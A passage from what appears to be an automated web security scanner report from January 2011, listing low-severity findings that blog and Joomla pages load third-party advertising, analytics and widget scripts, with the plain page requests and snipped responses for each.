http://ad.doubleclick.net/adj/database.ittoolbox/blogs;pos=boxlarge;role=0;cs=0;ind=0;kw=;sz=1x1,336x280,300x250,300x600;tile=7;ord=1991070620?
http://ad.doubleclick.net/adj/database.ittoolbox/blogs;pos=horizlarge;role=0;cs=0;ind=0;kw=database;kw=postgresql;kw=opensource;kw=oracle;kw=sql;kw=greenplum;kw=datawarehouse;kw=businessintellignce;kw=bi;kw=linux;sz=728x90,468x60,1x1;tile=6;ord=1991070620?
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://jlinks.industrybrains.com/jsct?sid=940&ct=TOOLBOX_ROS&num=5&layt=560x350v1&fmt=simp

Request

GET /blogs/database-soup HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 61117
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 15:03:34 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Database So
...[SNIP]...
<link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" />
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
<div align="center" style="margin-top:inherit;margin-bottom:5px">
   <script src="http://ad.doubleclick.net/adj/database.ittoolbox/blogs;pos=horizlarge;role=0;cs=0;ind=0;kw=database;kw=postgresql;kw=opensource;kw=oracle;kw=sql;kw=greenplum;kw=datawarehouse;kw=businessintellignce;kw=bi;kw=linux;sz=728x90,468x60,1x1;tile=6;ord=1991070620?">

   </script>
...[SNIP]...
<div id="ctl00_ctl00_m_marchexAd" class="spacer">

<script type="text/javascript"src="http://jlinks.industrybrains.com/jsct?sid=940&ct=TOOLBOX_ROS&num=5&layt=560x350v1&fmt=simp"></script>
...[SNIP]...
<div align="center" style="margin-top:inherit;margin-bottom:5px">
   <script src="http://ad.doubleclick.net/adj/database.ittoolbox/blogs;pos=boxlarge;role=0;cs=0;ind=0;kw=;sz=1x1,336x280,300x250,300x600;tile=7;ord=1991070620?">

   </script>
...[SNIP]...

21.227. http://it.toolbox.com/blogs/database-talk previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/database-talk

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/database.ittoolbox/blogs;pos=boxlarge;role=0;cs=0;ind=0;kw=;cont=DM;sz=1x1,336x280,300x250,300x600;tile=7;ord=1306366885?
http://ad.doubleclick.net/adj/database.ittoolbox/blogs;pos=horizlarge;role=0;cs=0;ind=0;kw=database;kw=DB2;kw=applicationdevelopment;kw=databasetechnology;kw=dba;kw=IBM;cont=DM;sz=728x90,468x60,1x1;tile=6;ord=1306366885?
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://cdn.widgetserver.com/syndication/subscriber/InsertWidget.js
http://jlinks.industrybrains.com/jsct?sid=940&ct=TOOLBOX_ROS&num=5&layt=560x350v1&fmt=simp

Request

GET /blogs/database-talk HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63385
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 15:01:15 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Database Ta
...[SNIP]...
<link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" />
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
<div align="center" style="margin-top:inherit;margin-bottom:5px">
   <script src="http://ad.doubleclick.net/adj/database.ittoolbox/blogs;pos=horizlarge;role=0;cs=0;ind=0;kw=database;kw=DB2;kw=applicationdevelopment;kw=databasetechnology;kw=dba;kw=IBM;cont=DM;sz=728x90,468x60,1x1;tile=6;ord=1306366885?">

   </script>
...[SNIP]...
<div id="ctl00_ctl00_m_marchexAd" class="spacer">

<script type="text/javascript"src="http://jlinks.industrybrains.com/jsct?sid=940&ct=TOOLBOX_ROS&num=5&layt=560x350v1&fmt=simp"></script>
...[SNIP]...
<div align="center" style="margin-top:inherit;margin-bottom:5px">
   <script src="http://ad.doubleclick.net/adj/database.ittoolbox/blogs;pos=boxlarge;role=0;cs=0;ind=0;kw=;cont=DM;sz=1x1,336x280,300x250,300x600;tile=7;ord=1306366885?">

   </script>
...[SNIP]...
<br>
<script type="text/javascript" src="http://cdn.widgetserver.com/syndication/subscriber/InsertWidget.js"></script>
...[SNIP]...

21.228. http://it.toolbox.com/blogs/db2luw previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/db2luw

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/database.ittoolbox/blogs;pos=boxlarge;role=0;cs=0;ind=0;kw=;cont=DM;sz=1x1,336x280,300x250,300x600;tile=7;ord=1835161449?
http://ad.doubleclick.net/adj/database.ittoolbox/blogs;pos=horizlarge;role=0;cs=0;ind=0;kw=DB2;kw=IBM;kw=DB2tips;kw=DB2blog;kw=DB2features;kw=database;cont=DM;sz=728x90,468x60,1x1;tile=6;ord=1835161449?
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://jlinks.industrybrains.com/jsct?sid=940&ct=TOOLBOX_ROS&num=5&layt=560x350v1&fmt=simp
http://pmetrics.performancing.com/5970.js

Request

GET /blogs/db2luw HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 62898
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 15:00:40 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   An Expert's
...[SNIP]...
<link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" />
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
<div align="center" style="margin-top:inherit;margin-bottom:5px">
   <script src="http://ad.doubleclick.net/adj/database.ittoolbox/blogs;pos=horizlarge;role=0;cs=0;ind=0;kw=DB2;kw=IBM;kw=DB2tips;kw=DB2blog;kw=DB2features;kw=database;cont=DM;sz=728x90,468x60,1x1;tile=6;ord=1835161449?">

   </script>
...[SNIP]...
<div id="ctl00_ctl00_m_marchexAd" class="spacer">

<script type="text/javascript"src="http://jlinks.industrybrains.com/jsct?sid=940&ct=TOOLBOX_ROS&num=5&layt=560x350v1&fmt=simp"></script>
...[SNIP]...
<div align="center" style="margin-top:inherit;margin-bottom:5px">
   <script src="http://ad.doubleclick.net/adj/database.ittoolbox/blogs;pos=boxlarge;role=0;cs=0;ind=0;kw=;cont=DM;sz=1x1,336x280,300x250,300x600;tile=7;ord=1835161449?">

   </script>
...[SNIP]...
<br>

<script src="http://pmetrics.performancing.com/5970.js" type="text/javascript"></script>
...[SNIP]...

21.229. http://it.toolbox.com/blogs/db2zos previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/db2zos

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/database.ittoolbox/blogs;pos=boxlarge;role=0;cs=0;ind=0;kw=;sz=1x1,336x280,300x250,300x600;tile=7;ord=1832816375?
http://ad.doubleclick.net/adj/database.ittoolbox/blogs;pos=horizlarge;role=0;cs=0;ind=0;kw=database;kw=DB2;kw=z%2fOS;kw=db;kw=IBM;kw=DB29;kw=DB28;sz=728x90,468x60,1x1;tile=6;ord=1832816375?
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://jlinks.industrybrains.com/jsct?sid=940&ct=TOOLBOX_ROS&num=5&layt=560x350v1&fmt=simp
http://twittercounter.com/embed/?username=wfavero&style=bird
http://www.tripit.com/account/badge/id/2069AEE8D54DCEC2C6A1A296C257E1E6/div_id/tripit-badge/badge.js

Request

GET /blogs/db2zos HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 78332
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 15:00:56 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Getting the
...[SNIP]...
<link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" />
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
<div align="center" style="margin-top:inherit;margin-bottom:5px">
   <script src="http://ad.doubleclick.net/adj/database.ittoolbox/blogs;pos=horizlarge;role=0;cs=0;ind=0;kw=database;kw=DB2;kw=z%2fOS;kw=db;kw=IBM;kw=DB29;kw=DB28;sz=728x90,468x60,1x1;tile=6;ord=1832816375?">

   </script>
...[SNIP]...
<div id="ctl00_ctl00_m_marchexAd" class="spacer">

<script type="text/javascript"src="http://jlinks.industrybrains.com/jsct?sid=940&ct=TOOLBOX_ROS&num=5&layt=560x350v1&fmt=simp"></script>
...[SNIP]...
<div align="center" style="margin-top:inherit;margin-bottom:5px">
   <script src="http://ad.doubleclick.net/adj/database.ittoolbox/blogs;pos=boxlarge;role=0;cs=0;ind=0;kw=;sz=1x1,336x280,300x250,300x600;tile=7;ord=1832816375?">

   </script>
...[SNIP]...
<div id="tripit-badge"><script type="text/javascript" src="http://www.tripit.com/account/badge/id/2069AEE8D54DCEC2C6A1A296C257E1E6/div_id/tripit-badge/badge.js"></script>
...[SNIP]...
<br>

<script type="text/javascript" language="JavaScript" src="http://twittercounter.com/embed/?username=wfavero&style=bird"></script>
...[SNIP]...

21.230. http://it.toolbox.com/blogs/elsua previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/elsua

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/km.ittoolbox/blogs;pos=boxlarge;role=0;cs=0;ind=0;kw=;cont=DM;sz=1x1,336x280,300x250,300x600;tile=7;ord=1239133873?
http://ad.doubleclick.net/adj/km.ittoolbox/blogs;pos=horizlarge;role=0;cs=0;ind=0;kw=kowledgemanagement;kw=collaboration;kw=communitiesofpractice;kw=socialnetworking;kw=andweb2.0;kw=technology;kw=IT;cont=DM;sz=728x90,468x60,1x1;tile=6;ord=1239133873?
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://jlinks.industrybrains.com/jsct?sid=940&ct=TOOLBOX_ROS&num=5&layt=560x350v1&fmt=simp

Request

GET /blogs/elsua HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 64411
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 15:01:05 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   elsua: The
...[SNIP]...
<link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" />
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
<div align="center" style="margin-top:inherit;margin-bottom:5px">
   <script src="http://ad.doubleclick.net/adj/km.ittoolbox/blogs;pos=horizlarge;role=0;cs=0;ind=0;kw=kowledgemanagement;kw=collaboration;kw=communitiesofpractice;kw=socialnetworking;kw=andweb2.0;kw=technology;kw=IT;cont=DM;sz=728x90,468x60,1x1;tile=6;ord=1239133873?">

   </script>
...[SNIP]...
<div id="ctl00_ctl00_m_marchexAd" class="spacer">

<script type="text/javascript"src="http://jlinks.industrybrains.com/jsct?sid=940&ct=TOOLBOX_ROS&num=5&layt=560x350v1&fmt=simp"></script>
...[SNIP]...
<div align="center" style="margin-top:inherit;margin-bottom:5px">
   <script src="http://ad.doubleclick.net/adj/km.ittoolbox/blogs;pos=boxlarge;role=0;cs=0;ind=0;kw=;cont=DM;sz=1x1,336x280,300x250,300x600;tile=7;ord=1239133873?">

   </script>
...[SNIP]...

21.231. http://it.toolbox.com/blogs/juice-analytics previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/juice-analytics

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/bi.ittoolbox/blogs;pos=boxlarge;role=0;cs=0;ind=0;kw=;cont=DM;sz=1x1,336x280,300x250,300x600;tile=7;ord=966046989?
http://ad.doubleclick.net/adj/bi.ittoolbox/blogs;pos=horizlarge;role=0;cs=0;ind=0;kw=bi;kw=businessintelligence;kw=analytics;kw=customeranalytics;kw=Excel;kw=mapping;cont=DM;sz=728x90,468x60,1x1;tile=6;ord=966046989?
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://jlinks.industrybrains.com/jsct?sid=940&ct=TOOLBOX_ROS&num=5&layt=560x350v1&fmt=simp

Request

GET /blogs/juice-analytics HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 61828
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 15:02:15 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Juice Analy
...[SNIP]...
<link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" />
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
<div align="center" style="margin-top:inherit;margin-bottom:5px">
   <script src="http://ad.doubleclick.net/adj/bi.ittoolbox/blogs;pos=horizlarge;role=0;cs=0;ind=0;kw=bi;kw=businessintelligence;kw=analytics;kw=customeranalytics;kw=Excel;kw=mapping;cont=DM;sz=728x90,468x60,1x1;tile=6;ord=966046989?">

   </script>
...[SNIP]...
<div id="ctl00_ctl00_m_marchexAd" class="spacer">

<script type="text/javascript"src="http://jlinks.industrybrains.com/jsct?sid=940&ct=TOOLBOX_ROS&num=5&layt=560x350v1&fmt=simp"></script>
...[SNIP]...
<div align="center" style="margin-top:inherit;margin-bottom:5px">
   <script src="http://ad.doubleclick.net/adj/bi.ittoolbox/blogs;pos=boxlarge;role=0;cs=0;ind=0;kw=;cont=DM;sz=1x1,336x280,300x250,300x600;tile=7;ord=966046989?">

   </script>
...[SNIP]...

21.232. http://it.toolbox.com/blogs/minimalit previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/minimalit

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/projectmanagement.ittoolbox/blogs;pos=boxlarge;role=0;cs=0;ind=0;kw=;cont=DM;sz=1x1,336x280,300x250,300x600;tile=7;ord=424581492?
http://ad.doubleclick.net/adj/projectmanagement.ittoolbox/blogs;pos=horizlarge;role=0;cs=0;ind=0;kw=minimalit;kw=managament;kw=itarchitecture;kw=itspend;kw=spendreduction;cont=DM;sz=728x90,468x60,1x1;tile=6;ord=424581492?
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://jlinks.industrybrains.com/jsct?sid=940&ct=TOOLBOX_ROS&num=5&layt=560x350v1&fmt=simp

Request

GET /blogs/minimalit HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 60086
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 15:02:32 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Minimal IT:
...[SNIP]...
<link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" />
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
<div align="center" style="margin-top:inherit;margin-bottom:5px">
   <script src="http://ad.doubleclick.net/adj/projectmanagement.ittoolbox/blogs;pos=horizlarge;role=0;cs=0;ind=0;kw=minimalit;kw=managament;kw=itarchitecture;kw=itspend;kw=spendreduction;cont=DM;sz=728x90,468x60,1x1;tile=6;ord=424581492?">

   </script>
...[SNIP]...
<div id="ctl00_ctl00_m_marchexAd" class="spacer">

<script type="text/javascript"src="http://jlinks.industrybrains.com/jsct?sid=940&ct=TOOLBOX_ROS&num=5&layt=560x350v1&fmt=simp"></script>
...[SNIP]...
<div align="center" style="margin-top:inherit;margin-bottom:5px">
   <script src="http://ad.doubleclick.net/adj/projectmanagement.ittoolbox/blogs;pos=boxlarge;role=0;cs=0;ind=0;kw=;cont=DM;sz=1x1,336x280,300x250,300x600;tile=7;ord=424581492?">

   </script>
...[SNIP]...

21.233. http://it.toolbox.com/blogs/penguinista-databasiensis previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/penguinista-databasiensis

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/linux.ittoolbox/blogs;pos=boxlarge;role=0;cs=0;ind=0;kw=;sz=1x1,336x280,300x250,300x600;tile=7;ord=2048454184?
http://ad.doubleclick.net/adj/linux.ittoolbox/blogs;pos=horizlarge;role=0;cs=0;ind=0;kw=linux;kw=DB2;kw=database;kw=IBM;sz=728x90,468x60,1x1;tile=6;ord=2048454184?
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://jlinks.industrybrains.com/jsct?sid=940&ct=TOOLBOX_ROS&num=5&layt=560x350v1&fmt=simp

Request

GET /blogs/penguinista-databasiensis HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 46021
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 15:01:24 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Penguinista
...[SNIP]...
<link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" />
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
<div align="center" style="margin-top:inherit;margin-bottom:5px">
   <script src="http://ad.doubleclick.net/adj/linux.ittoolbox/blogs;pos=horizlarge;role=0;cs=0;ind=0;kw=linux;kw=DB2;kw=database;kw=IBM;sz=728x90,468x60,1x1;tile=6;ord=2048454184?">

   </script>
...[SNIP]...
<div id="ctl00_ctl00_m_marchexAd" class="spacer">

<script type="text/javascript"src="http://jlinks.industrybrains.com/jsct?sid=940&ct=TOOLBOX_ROS&num=5&layt=560x350v1&fmt=simp"></script>
...[SNIP]...
<div align="center" style="margin-top:inherit;margin-bottom:5px">
   <script src="http://ad.doubleclick.net/adj/linux.ittoolbox/blogs;pos=boxlarge;role=0;cs=0;ind=0;kw=;sz=1x1,336x280,300x250,300x600;tile=7;ord=2048454184?">

   </script>
...[SNIP]...

21.234. http://it.toolbox.com/blogs/ppmtoday previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://it.toolbox.com
Path:	/blogs/ppmtoday

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/projectmanagement.ittoolbox/blogs;pos=boxlarge;role=0;cs=0;ind=0;kw=;cont=DM;sz=1x1,336x280,300x250,300x600;tile=7;ord=1517562571?
http://ad.doubleclick.net/adj/projectmanagement.ittoolbox/blogs;pos=horizlarge;role=0;cs=0;ind=0;kw=ppm;kw=projectportfoliomanagement;kw=projectmanagement;kw=portfoliomanagement;kw=itmanagement;cont=DM;sz=728x90,468x60,1x1;tile=6;ord=1517562571?
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://jlinks.industrybrains.com/jsct?sid=940&ct=TOOLBOX_ROS&num=5&layt=560x350v1&fmt=simp
http://www.google-analytics.com/urchin.js

Request

GET /blogs/ppmtoday HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63634
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 15:00:27 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Future Stat
...[SNIP]...
<link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" />
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
<div align="center" style="margin-top:inherit;margin-bottom:5px">
   <script src="http://ad.doubleclick.net/adj/projectmanagement.ittoolbox/blogs;pos=horizlarge;role=0;cs=0;ind=0;kw=ppm;kw=projectportfoliomanagement;kw=projectmanagement;kw=portfoliomanagement;kw=itmanagement;cont=DM;sz=728x90,468x60,1x1;tile=6;ord=1517562571?">

   </script>
...[SNIP]...
<div id="ctl00_ctl00_m_marchexAd" class="spacer">

<script type="text/javascript"src="http://jlinks.industrybrains.com/jsct?sid=940&ct=TOOLBOX_ROS&num=5&layt=560x350v1&fmt=simp"></script>
...[SNIP]...
<div align="center" style="margin-top:inherit;margin-bottom:5px">
   <script src="http://ad.doubleclick.net/adj/projectmanagement.ittoolbox/blogs;pos=boxlarge;role=0;cs=0;ind=0;kw=;cont=DM;sz=1x1,336x280,300x250,300x600;tile=7;ord=1517562571?">

   </script>
...[SNIP]...
<span><script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

21.235. http://javascript.internet.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://javascript.internet.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://e1.cdn.qnsr.com/cgi/d/0/0/203/662677/cmp0.js
http://e1.cdn.qnsr.com/jsc/e1/fc.js
http://e1.cdn.qnsr.com/jsc/e1/fx.js
http://javascriptsource.us.intellitxt.com/intellitxt/front.asp?ipid=26021
http://jlinks.industrybrains.com/jsct?sid=829&ct=INTERNETCOM_DEVELOPER&tr=JAVASCRIPTINTERNET&num=5&layt=7&fmt=simp

Request

GET / HTTP/1.1
Host: javascript.internet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:30:30 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Tue, 25 Jan 2011 14:31:30 GMT
Connection: close
Content-Type: text/html
Content-Length: 70536

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>JavaScript Source: Free JavaScripts, Tutorials, Example Code, Reference, Res
...[SNIP]...


<script language="javascript" src="http://e1.cdn.qnsr.com/cgi/d/0/0/203/662677/cmp0.js"></script>
<script language="javascript" src="http://e1.cdn.qnsr.com/jsc/e1/fx.js"></script>
<script language="JavaScript" src="http://e1.cdn.qnsr.com/jsc/e1/fc.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://jlinks.industrybrains.com/jsct?sid=829&ct=INTERNETCOM_DEVELOPER&tr=JAVASCRIPTINTERNET&num=5&layt=7&fmt=simp"></script>
...[SNIP]...

<script type="text/javascript" src="http://javascriptsource.us.intellitxt.com/intellitxt/front.asp?ipid=26021"></script>
...[SNIP]...

21.236. http://joomfa.org/joomla-16-persian.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomfa.org
Path:	/joomla-16-persian.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://www.persianstat.com/service/stat.js

Request

GET /joomla-16-persian.html HTTP/1.1
Host: joomfa.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.237. http://joomla.jp/news/1-projectnews/169-joomla-16-has-arrived.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomla.jp
Path:	/news/1-projectnews/169-joomla-16-has-arrived.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /news/1-projectnews/169-joomla-16-has-arrived.html HTTP/1.1
Host: joomla.jp
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.238. http://joomla.pl/powiadomienia/577-joomla-16-wydany.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomla.pl
Path:	/powiadomienia/577-joomla-16-wydany.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /powiadomienia/577-joomla-16-wydany.html HTTP/1.1
Host: joomla.pl
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.239. http://joomlacode.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET / HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:38:32 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 24 Jan 2011 22:30:01 GMT
ETag: "1358c51-4fb1-49a9f23fb6c40"
Accept-Ranges: bytes
Content-Length: 20401
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.240. http://joomlacode.org/gf/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.241. http://joomlacode.org/gf/&hl=en&client=ca-pub-1189370408998555&adU=Nexternal.com/Joomla-Shopping-Cart&adT=Joomla+Compatible+Cart&adU=www.lynda.com&adT=Joomla+Tutorials&gl=US/x26amp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
